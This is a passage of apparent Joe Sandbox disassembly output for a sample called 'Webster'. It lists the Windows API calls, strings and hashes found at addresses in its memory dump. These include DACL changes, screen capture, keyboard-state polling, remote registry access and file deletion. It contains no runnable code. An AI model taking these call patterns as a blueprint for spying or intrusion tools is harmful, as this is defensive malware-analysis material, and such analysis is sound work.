                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                    • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                                                    • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                                                    • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8B2E
                                                                                  • _memset.LIBCMT ref: 00AD8B43
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8B62
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8B73
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00AD8BB0
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD8BCC
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8BE9
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD8BF8
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD8BFF
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8C20
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00AD8C27
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8C58
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8C7E
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8C92
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00AF7A79
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AF7A85
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00AF7A91
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00AF7A9E
                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AF7AF2
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AF7B2E
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AF7B52
                                                                                  • SelectObject.GDI32(00000006,?), ref: 00AF7B5A
                                                                                  • DeleteObject.GDI32(?), ref: 00AF7B63
                                                                                  • DeleteDC.GDI32(00000006), ref: 00AF7B6A
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00AF7B75
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA4D4
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00AEA4F6
                                                                                  • __swprintf.LIBCMT ref: 00AEA54F
                                                                                  • __swprintf.LIBCMT ref: 00AEA568
                                                                                  • _wprintf.LIBCMT ref: 00AEA61E
                                                                                  • _wprintf.LIBCMT ref: 00AEA63C
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 311963372-2391861430
                                                                                  APIs
                                                                                    • Part of subcall function 00AE951A: __time64.LIBCMT ref: 00AE9524
                                                                                    • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                                                  • __wsplitpath.LIBCMT ref: 00AE97EF
                                                                                    • Part of subcall function 00AA431E: __wsplitpath_helper.LIBCMT ref: 00AA435E
                                                                                  • _wcscpy.LIBCMT ref: 00AE9802
                                                                                  • _wcscat.LIBCMT ref: 00AE9815
                                                                                  • __wsplitpath.LIBCMT ref: 00AE983A
                                                                                  • _wcscat.LIBCMT ref: 00AE9850
                                                                                  • _wcscat.LIBCMT ref: 00AE9863
                                                                                    • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE9599
                                                                                    • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE95A8
                                                                                  • _wcscmp.LIBCMT ref: 00AE97AA
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AE9A0D
                                                                                  • _wcsncpy.LIBCMT ref: 00AE9A80
                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 00AE9AB6
                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AE9ACC
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9ADD
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9AEF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1500180987-0
                                                                                  • Opcode ID: 5da06501f3057f5d0b96b8e419705d47d6038dfb4b53d4fd13463ff0d391d3f8
                                                                                  • Instruction ID: 3095023f62ac59f50fe565d7bb0aae3c1f0f154f901b7a083ea9bab1da3feeb1
                                                                                  • Opcode Fuzzy Hash: 5da06501f3057f5d0b96b8e419705d47d6038dfb4b53d4fd13463ff0d391d3f8
                                                                                  • Instruction Fuzzy Hash: B5C13BB1A00218AADF21DF95CD85EDFB7BDAF49340F0040AAF609E7151EB709A858F65
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95BF1
                                                                                  • GetMenuItemCount.USER32(00B47890), ref: 00AD0E7B
                                                                                  • GetMenuItemCount.USER32(00B47890), ref: 00AD0F2B
                                                                                  • GetCursorPos.USER32(?), ref: 00AD0F6F
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00AD0F78
                                                                                  • TrackPopupMenuEx.USER32(00B47890,00000000,?,00000000,00000000,00000000), ref: 00AD0F8B
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AD0F97
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2751501086-0
                                                                                  • Opcode ID: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                                                  • Instruction ID: cab97db5cce7f61a7fc6afe098db7ab369d69d1d87f2c2afea590e0c72f00b87
                                                                                  • Opcode Fuzzy Hash: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                                                  • Instruction Fuzzy Hash: D371E330A44609BFEF219B65CC85FAABFA9FF04364F244217F515A62D1CBB1A850DB90
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • _memset.LIBCMT ref: 00AD8489
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AD84BE
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AD84DA
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AD84F6
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AD8520
                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AD8548
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8553
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8558
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 1411258926-22481851
                                                                                  • Opcode ID: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                                                  • Instruction ID: 906e5ff5acd6ec8a9590a181f2135083653b01afff53c29e91e91692f9802743
                                                                                  • Opcode Fuzzy Hash: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                                                  • Instruction Fuzzy Hash: 0041F872D1022EABCF11EBA4DD95DEDB7B8FF04340F404569F816A3261EA759E44CB90
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 3964851224-909552448
                                                                                  • Opcode ID: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                                                  • Instruction ID: f97a8a8cf1eb4a383f772ff72ba877b3be9fe0ddeaaf45cba8c5088abeb68a74
                                                                                  • Opcode Fuzzy Hash: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                                                  • Instruction Fuzzy Hash: E0411B3250025A8BDF08EF94D981AEA3BA4FF62344F604895FC526B292DB30ED19CB50
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00A9153B: _memmove.LIBCMT ref: 00A915C4
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AE58EB
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AE5901
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AE5912
                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AE5924
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AE5935
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_memmove
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 2279737902-1007645807
                                                                                  • Opcode ID: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                                                  • Instruction ID: 318a1e3be6267dc776b9cd56e925c2e4713f7a41b799c236314b008154d045e4
                                                                                  • Opcode Fuzzy Hash: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                                                  • Instruction Fuzzy Hash: 16118231A9016AB9DB20A7A2DC5ADFF7BBCEBD1B50F900469B501A30E5EE601D05C5A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 208665112-3771769585
                                                                                  • Opcode ID: 374f4454a247837197c99afcb686ff8763d787d858b072ae1ad23049ebe6bd28
                                                                                  • Instruction ID: 58fe7ac41c4177cd3c89b18483b0751537cdf81b8907058fe57355a5b157bc8c
                                                                                  • Opcode Fuzzy Hash: 374f4454a247837197c99afcb686ff8763d787d858b072ae1ad23049ebe6bd28
                                                                                  • Instruction Fuzzy Hash: 3011E431919118AFDB11BB759D4AEEE77BCDF89710F1441A5F005970D1EFB099C18B90
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00AE5535
                                                                                    • Part of subcall function 00AA0859: timeGetTime.WINMM(?,00000002,00A8C22C), ref: 00AA085D
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00AE5561
                                                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00AE5585
                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AE55A7
                                                                                  • SetActiveWindow.USER32 ref: 00AE55C6
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AE55D4
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AE55F3
                                                                                  • Sleep.KERNEL32(000000FA), ref: 00AE55FE
                                                                                  • IsWindow.USER32 ref: 00AE560A
                                                                                  • EndDialog.USER32(00000000), ref: 00AE561B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1194449130-3405671355
                                                                                  • Opcode ID: d80f3b42bf5e0b3fa32a6c855bdfff5729391f7f5d938aea8bb32f6973332d46
                                                                                  • Instruction ID: 95c45389d1388ad709da7183f100617b37f8d6b0f66363651d80d990f274c6d1
                                                                                  • Opcode Fuzzy Hash: d80f3b42bf5e0b3fa32a6c855bdfff5729391f7f5d938aea8bb32f6973332d46
                                                                                  • Instruction Fuzzy Hash: 2A21D178A04644AFEB416F71FD88A7A3B6AFB56348F445018F001831A1CFB18E90DA31
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AEDC2D
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AEDCC0
                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00AEDCD4
                                                                                  • CoCreateInstance.OLE32(00B13D4C,00000000,00000001,00B3B86C,?), ref: 00AEDD20
                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AEDD8F
                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00AEDDE7
                                                                                  • _memset.LIBCMT ref: 00AEDE24
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00AEDE60
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AEDE83
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00AEDE8A
                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AEDEC1
                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00AEDEC3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1246142700-0
                                                                                  • Opcode ID: ac99e7c75e76baf078e3b9ec01c7f385fd1c0fcef0c94aad103013d23712eb92
                                                                                  • Instruction ID: 652b5b1d63dc317ac7cc9e028d66bcdae65bf95b47358597ad2cb3db93ee8ac3
                                                                                  • Opcode Fuzzy Hash: ac99e7c75e76baf078e3b9ec01c7f385fd1c0fcef0c94aad103013d23712eb92
                                                                                  • Instruction Fuzzy Hash: 86B1E975A00109AFDB14EFA5C989DAEBBF9FF88304B148459F906EB261DB70ED41CB50
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE0896
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE0901
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00AE0921
                                                                                  • GetKeyState.USER32(000000A0), ref: 00AE0938
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00AE0967
                                                                                  • GetKeyState.USER32(000000A1), ref: 00AE0978
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00AE09A4
                                                                                  • GetKeyState.USER32(00000011), ref: 00AE09B2
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00AE09DB
                                                                                  • GetKeyState.USER32(00000012), ref: 00AE09E9
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00AE0A12
                                                                                  • GetKeyState.USER32(0000005B), ref: 00AE0A20
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                                                  • Instruction ID: 6a8fb85d9b486da75056955d4c20d7fb509b7a40067e872e83ee3bbb5f2bc478
                                                                                  • Opcode Fuzzy Hash: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                                                  • Instruction Fuzzy Hash: D851B870A047D829FB35EBB24550BAABFB49F11380F488599D5C2571C3DAE49ACCCBA1
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00ADCE1C
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCE2E
                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ADCE8C
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00ADCE97
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCEA9
                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ADCEFD
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCF0B
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCF1C
                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ADCF5F
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00ADCF6D
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ADCF8A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00ADCF97
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                                                  • Instruction ID: a1d0915670c199780f843d40b73ed8735f2956b82015b6b6941eb7036d55cee9
                                                                                  • Opcode Fuzzy Hash: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                                                  • Instruction Fuzzy Hash: 4C516271B10205AFDF18DF69CD89AAEBBB6EB88710F54812DF516D7290DBB0AD40CB50
                                                                                  APIs
                                                                                    • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A824AF
                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00A8254A
                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00ABBFE7
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC018
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC02F
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC04B
                                                                                  • DeleteObject.GDI32(00000000), ref: 00ABC05D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 641708696-0
                                                                                  • Opcode ID: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                                                  • Instruction ID: 855b56e229e78838ccbc1b551019f69a53ac0c8b04908b493e9c0b83c536cec1
